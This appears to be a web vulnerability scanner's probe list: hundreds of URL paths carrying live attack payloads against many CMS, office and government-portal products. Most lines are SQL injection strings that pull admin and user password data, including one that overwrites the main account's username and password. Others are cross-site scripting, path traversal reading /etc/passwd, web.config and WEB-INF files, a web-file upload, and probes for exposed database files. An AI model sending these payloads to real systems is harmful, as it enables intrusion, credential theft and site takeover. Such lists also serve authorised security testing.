/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=3&class_id_1=22&pconsume=&orderby=add_time%20asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&sort=asc
/video.php
/news.php?classid=2
/ajax.php?action=dig&module=members%20set%20username=00000,password=0x3235306366386235316337373366336638646338623462653836376139613032%20where%20uid=1%20--%20a
/count.php?type=news%20SET%20views%20=%20views-1%20WHERE%20id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20concat(0x3a,md5(1122),0x3a)%20from%20boka_members%20where%20uid=1),0x5e24),1))--+&&action=showcount&id=1
/ajax.php?action=contentpage
/comments.php?id=3a&tablepre=boka_ckck
/rss.php?module=news&attasql=union%20select%201,reer,3,4%20from%20boka_members%20where%20uid=1%20order%20by%20id%20asc%20%20--%20a
//wap/board.php?filter=3%20union%20select%201,2,3,4,webscan,6,7,8,9,10,11,cfreer,13,14,15,16,17,18,19,20,21,22%20from%20boka_members%20where%20uid=1%20--%20a&classid=1a&digest=1
/admin/index.php?_m=../template/css/login.css%00&_a=admin_list
/case/?settings[met_img]=met_admin_table%20where%201=1%20--%201
/login.aspx?test=TestSystem&password=1122&oid=2%20and%202=(convert(int,char(106)))&uid=1
/info.php?fid=1&tblprefix=cms_msession%20and%201=reer%20--
/ajax.php?action=letter&letter=a
/index.php?q=1%25%2527%2520and%25201%253D2%2520%2523&do=search&action=lists&module=product
/index.php?action=detail&do=offer&title=%2527or%25201%253D2%2523
/index.php/Index/index/name/$%7B@print(md5(1122))%7D
/index.php?m=news&s=admin/newslist&submit=%E5%88%A0%E9%99%A4&did=999%29%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28selEct%20concat%28user,0x7c,password%29%20from%20f10bd198561acb0197452013b7a82429%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
/index.php?m=payment&s=admin/pickupmod
/admin/receive.php?signMsg=0FEBF34C4A2EBF825F60025D6C0576F2&version=%3Cobject%20data=data:text/html;base64,PHNjcmlwdD5hbGVydCg0Mjg3Myk8L3NjcmlwdD4=%3E
/user/City_ajax.aspx?Cityid=-1'%20%20union%20%20SELECT%20'webscan',2%20FROM%20fs_sys_User%20WHERE%20id=7%20%20and%20'1'='1
/servlet/ShowPic?filePath=/tomcat/webapps/ROOT/WEB-INF/web.xml
/mep-admin/DcServlet
/mep-admin/userAction!queryUser.action?start=0&limit=10
/admin/picupload.aspx
/manager/picupload.aspx
/microshop/index.php?act=api&op=get_personal_commend&data_count=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x7c,md5(1122),0x7c),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46%20from%20shopnc_admin
/TreeDialogController.zc?backId=buyer_id_0&backName=buyer_name_0&dialogType=radio&method=getBuyerDialog&tempBackId=temp_buyur_id_0&tempBackName=temp_buyer_name_0
/admin.php?c=ajax&f=exit&filename=opt&group_id=1%20union%20select%203,1,0,md5(1122),account,6%20from%20qinggan_adm%20where%20id%20like%201%23&identifier=1
/index.php?c=tj&f=include&js=/../../config.php
/index.php?c=ueditor&f=remote_image&upfile=http://0.0.0.0/reer.php
/api.php?c=opt&f=index&group_id=-1%20union%20select%201,2,0,md5(1122),5,6&identifier=reer
/radcontrols/editor/dialog.aspx?dialog=ImageManager&editorID=');%3C/script%3E%3CScRiPt/acu%20src=1%20onerror=alert(42873)%3E%3C/ScRiPt%3E%3Cscript%3E//&language=zh_CN&sessionID2=8ca6abaf-d361-328c-9178-%20f78311cd0329&UseEmbeddedScripts=yes&useSession=0
/system/nhome/login.jsp?message=%22)--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/cgi/index.cgi?error=badlogin&__mode=show_login%27%22%28%29%26%25%3CScRiPt%20%3Ealert%2842873%29%3C%2fScRiPt%3E
/
/styles/outlook1/tools/calendar/calEditEvent.php?action=edit%22%3E%3Cscript%3Ealert(42873)%3C/script%3Ebad=%22&calid=
/web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0
/forgetbf.asp?errstr=--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/Ajax_Handle/UploadAttachmentHandler.ashx
/Web/Exam_List.aspx?typeid=18%20or%20(char(106)=0)
/Ajax_Handle/UploadPictureHandler.ashx
/Ajax_Handle/UploadLocalVideoHandler.ashx
/index.php?m=api&a=userpreview
/index.php?m=Appmanager&a=loadapp
/CMSUploadFile.aspx
/api/shop.aspx
/sysinfo.jsp
/login/Log.aspx?loginname=/**/'/**/and/**/char(106)%3E0/**/--
/login/publicpage.aspx?infotype=InfoZWGK_zwgk'/**/and/**/char(106)%3E0/**/--&dic_name=
/file/MyDownLoad.ashx?path=../web.config
/file/PackagDownload.ashx?sessionId=../../../../../webscan.txt
/broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/
/feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20--
/channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20
/login/proexamineview.aspx?ActivityInstanceId='/**/and/**/user/**/%3E0/**/--
/api.php?op=video_api&pc_hash=test%22/%3Ec%3Cscscriptript%3Ealert(42873)%3C/scscriptript%3E&&do_complete=1&uid=1&snid=1
/FileDownloadServlet?websiteId=1&templateName=/&fileNames=../../WEB-INF/config/db/dataSource.xml
/setup/setup1.jsp
/examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx
/Article/?Type=18%20/**/and/**/1=char(106)--
/login/TransactList.aspx?ItemName='/**/and/**/1=char(106)/**/--
/file/EmailDownload.ashx?url=~/web.config&name=web.config
/file/UDFDownLoad.ashx?path=~/Global.asax&name=Global.asax
/file/DownLoad.ashx?path=~/Routes.config
/file/FileUpload.asmx/UploadFileBase64?url=~/Content/cesi.aspx&data=VGhpcyBpcyBhIHRlc3QgLSBieSBjZnJlZXIgd2Vic2Nhbg%3D%3D&status=0
/file/FileUpload.asmx/CopyFile?sourcePath=/web.config&targetPath=/Content/reer.txt&overwrite=true
/download.jsp?path=WEB-INF/&name=web.xml
/page/upload/down_file.jsp?fileName=ljer.gif'%20or%20'1'='2
/mx_form/order_save.php
/index.php?app=tag&ac=add&ts=do
/member.php?act=index
/Article/?KeyWord=1'%20and%201=char(97)%20--
/apas/portal/tableDownload/download.jsp?tmpfilename=../index.jsp
/admin/payonline.php?act=login&table=information_schema.SCHEMATA%20where%201=(select%201%20from%20%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/frame/help/read_help.php?HELP_ID=-1%20union%20select%201,2,3,concat(0x7c,md5(1122),0x7c),5,6
/Channel/SearchResult.aspx?ItemName=1'%20or%201%3Echar(106)%20--
/Broadcast/Broadcast.aspx?type='%20or%201=char(106)%20--
/Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)--
/Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)--
/jvideo/down.jsp?pathfile=/WEB-INF/ini/merpserver.ini%00.flv
/jiep/down.jsp?pathfile=down.jsp%00.txt
/index.php?m=Goods&a=showcate&id=1'cfreer
/Goods-showcate-id-1.html'cfreer
/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20md5(1122)%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
/jvideo/objectbox/selectx_userlist.jsp
/yhzc/NewFile.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isPass.jsp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isFlag.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20--
/Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20--
/Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)--
/celerityAlleywayDetail.do?type=7'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)--
/ViewSource/SrcStencilList.aspx?listType=1&SerailNO=11xxxxxxxx&buqiId=22&infoflowId=1122'%20and/**/1=char(106)--
/ViewSource/ProExamineView.aspx?ActivityInstanceId=0&ActivitySchemeGuid=00000000-0000-0000-0000-00000000000'--
/burgherServiceDetail.do?bs=1&serviceType=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/yushouli/yushouliResult.do?item_ID=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/indexGetDatags.do?depNO=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/bqbzDetail.do?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/counter/counter2.php?id=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,md5(1122))%20as%20char),0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/oa_server/App_Pages/App_page/UserSpuerAdd.aspx
/oa_server/App_Pages/App_page/user_list.aspx
/cms/cms/site/cms_site_template_upload.jsp?action=save
/cai_study.asp?FN=cai/test.flv&cls_no=&cai_no=lzgy&stu_no=1122'%20and%201=char(106);--
/deptProceedingDetailnew.do?itemtype=6&depNO=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122&approveName=&nowPage=3
/deptProceedingDetailnew.do?itemtype=12%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)&depNO=jx&approveName=&nowPage=3
/lm/front/reg.jsp?sysid=../reg.jsp%00.jpg
/web/SubmitLogin.do
/pic.aspx?classid=60)%20and%201=char(106)%20--
/frm/Count.aspx?id=29308%20AND%201=char(106)%20--&type=List
/engine/websigncontrol/readsigndata.jsp?id='%20union%20select%20concat(char(98,121),0x7c,char(99,102,114,101,101,114))%23
/index.php?c=MTA3==&op=../../../../../../../../../../etc/passwd%00.jpg
/SRP2003/UserManage/sysuser/modifypage.asp?id=1
/venus/AsVenusCA/desk/message/reply.asp
/Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)--
/mx_form/order_save.php?form_id=5
/download.aspx?id=337&accessory=UploadFile/softdown/../../web.config
/cms/web/testsql.jsp
/web/zwdt/jjj.BjcxServlet
/login.php?LOGIN_USER_INCLUDE=/etc/passwd
/cms/client/uploadpic_html.jsp?toname=test.jsp&diskno=webscan
/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=11&AddWebColumnID=22&filepath=/app/
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
/webUser/webUser!list.action
/logincheck.php?UNAME=cfreer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/admin/annual/delete_leave.post.php
/admin/workingsituation/check.php?uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29&project=459&type=task&name=bbb
/admin/workingsituation/download_excel.php?day=30&start=&end=&project=0&uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29%23&task=0
/admin/workingsituation/ajax.php?task_id=10039s&type=update_status&status=1s%27%20and%201%3D%28updatexml%281%2Cconcat%280x23%2C%28select%20md5%281122%29%29%2C0x23%29%2C1%29%29%23
/down.asp?cat_%69d=3%20and%201=2%20union%20select%201,'ijx',3,4,5,6,7,8,9,10,11,12,13%20from%20admin
/jdwm/cgi/getpwd.cgi
/public/jspdownload.jsp?FileFullPath=%5Cetc%5Cpasswd&FileName=passwd
/public/jspdownload.jsp?FileFullPath=c:%5Cwindows%5Cwin.ini&FileName=win.ini
/cms/web/jspdownload.jsp?FileUrl=c:%5Cwindows%5Cwin.ini
/cms/web/jspdownload.jsp?FileUrl=%5Cetc%5Cpasswd
/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/reer.txt
/CorpInfo/CorpBaseInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAptitudeInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/PersonnelList.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAchievementList_SG.aspx?CorpCode=1122'%20and%201=char(106)%20--
/Credit/ShowCorpCredit.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpDeBox.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpRewardsList.aspx?RewardsPunishment=1122&CorpCode=1122'%20and%201=char(106)%20--
/BM/Project/HistoryBindSegmentLeftList.aspx?CorpType=1122&CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpSendLeftTree.aspx?JoinID=1122&CorpCode=1122'%20and%201=char(106)%20--
/forUI/Policy/showPolicy.aspx?ID=1122'%20and%201=char(106)%20--
/forUI/Person/EmplInfo.aspx?IDCard=1122'%20AND%201=CHAR(106)%20--%20
/forUI/Policy/DO.file?ID='%20or%201=char(106)%20--
/search/index/portalId/427?keyword=1'%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(114)%7C%7Cchr(101)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(114)%20FROM%20dual)))%7C%7C'
/Ajax_Handle/UploadAttachmentHandler.ashx
/ExtendForm/Down/Technological.aspx?id=1'%20and%201=char(106)%20--
/public/editext/up/soundsave.asp
/public/AspUpload/upload.asp?path=../../upload&processid=1
/xyEmployee_checkLoginForUser.do?userName=reer
/opac/ajax_get_file.php?filename=../admin/opacadminpwd.php
/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
/kc_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL#
/kecheng.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL#%20
/kecheng_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/include/ad.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/index.php?language_id=1%20and%20%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28select%28md5%281122%29%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23&is_protect=1&action=cccc
/picnews.asp?%69d=-1%20and%201=2%20union%20select%201,2,3,chr(106),5,6,7,8,9,10,11,12%20from%20admin
/opensoft.asp?%69d=10%20and%201=2
/phpsso_server/?m=phpsso&c=index&a=getapplist&appid=1&data=
/bmsltxDetail.do
/setAcceptance.do
/setAcceptance.do
/setMaterials.do?ITEM_ID=12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/intoSpDept.do?bmid=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/nobom.php
/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1'%20AND%209935=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(112)%7C%7CCHR(102)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9935=9935)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(115)%7C%7CCHR(115)%7C%7CCHR(113))%20AND%20'keyi'='keyi&filters=
/lm/front/mailhotlist.jsp?editpagename=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&sysid=001
/lm/front/findpsw.jsp?editpagename=&groupid=&sysid=../../../../../../../../../../etc/passwd%00.jpg
/admin/Admin_Config.asp
/Project_SPInfoList.aspx?CategoryCode=1'%20and%201=char(106)%20--
/zxts_view.aspx?Id=4%20and%201=char(106)%20--&GBType=1
/FileUpload
/oa_server/App_Pages/App_page/user_update.aspx?userid=172
/api.php?c=api&f=phpok&id=_sublist&param[pid]=1%20union%20select%20concat(md5(1122),0x7c,pass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20from%20qinggan_user%23&param[phpok]=1
/conformID.asp?Tid=jx'%20and%201=char(106)%20--
/DelAccessID.asp?AccessID=1'%20and%201=char(106)%20--&Datetime=
/KS_Data/KesionCMS6.mdb
/KS_Data/KesionCMS7.mdb
/KS_Data/KesionCMS8.mdb
/KS_Data/KesionCMS9.mdb
/conformID.asp?Tname=web'%20/**/and/**/1=char(106)--
/Asearch.asp
/linklist.asp?TlinkID=26'/**/and/**/1=char(106)--
/zyjs.asp?Txy=18&tzy=11'%20/**/and/**/1=char(106)%20--
/Biogenic.asp?Tbynf=21'%20and%201=char(106)%20--
/specialty.asp?Tbynf=1%20and%201%3Echar(106)%20--
/api.php?op=video_api&pc_hash=1&uid=1&snid=1122%22%20onmouseover=alert(42873)//&do_complete=1
/toall/desktop/dbform.asp?fn=&fntxt=&varid=8%20AND%201122%3DCONVERT%28INT%2C%28CHAR%2899%29%2bCHAR%28102%29%2bCHAR%28114%29%2bCHAR%28101%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28106%29%2bCHAR%28120%29%29%29
/index.php?c=ajax&a=member_login&template=../../ooxx.php
/addcontent/webEditor/upload/files/file_down.jsp?filename=/../../../../WEB-INF/web.xml
/addcontent/webEditor/upload/files/file_down.jsp?filename=/.xx/./.xx/./.xx/./.xx/./WEB-INxx/F/web.xml
/Tools/FileTool/Manage/Notepad.aspx?objfile=C:/windows/win.ini
/Tools/FileTool/Manage/Notepad.aspx?objfile=/etc/passwd
/workflow/flow_details.aspx?action=details&job_id=-12%20and%201=char(106)
/search.aspx
/servlet/fileOpenforms?filename=/index.jsp
/application/gzhd/bgxz/download.jsp?filename=/index.jsp
/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1122'%20and%201=char(106)%20--
/truexxgk/app/nrglController/loadZwgk?zdjc=reer'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&type=1
/NewsList.asp
/ActivityList.asp
/WidgetsHandler.ashx?widget=reer'%20where%201=1%20AND%20char(106)%3E0--
/common/guestbook.php
/common/help.php
/Comment/Comment.aspx?id=11'%20and%201=char(106)%20--
/wap/index.php?a=newslist
/index.php?_COOKIE[cfg][database]=mysql&_COOKIE[cfg][db_host]=localhost&_COOKIE[cfg][db_user]=webscan&_COOKIE[cfg][db_pass]=reer&_COOKIE[cfg][db_name]=db
/?question/tag/0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/?question/search/tag:0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/admin/uploadFile.action
/Adminiscentertrator/AdmIndex.asp
/Adminiscentertrator/AdmLinkInsert.asp
/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/NewsList.asp
/bit-xxzs/xmlpzs/bsdetail.asp?id=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/ysxkdetail.asp?permitsaleno=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/index.php?case=archive&act=orders&aid[aid%60%3D2%20and%200%20union%20select%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,md5(1122),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_user%20where%20userid%3C2%20%20--%20%20a]=26
/zhanshi/equzhanshi.aspx?equid=-301'%20and%201=char(106)%20--
/prozhanshi/zice.aspx?id=-101'%20and%201=char(106)%20AND%20'at'='at
/prozhanshi/yuxi.aspx?id=-306'%20and%201=char(106)%20and%20'at'='at
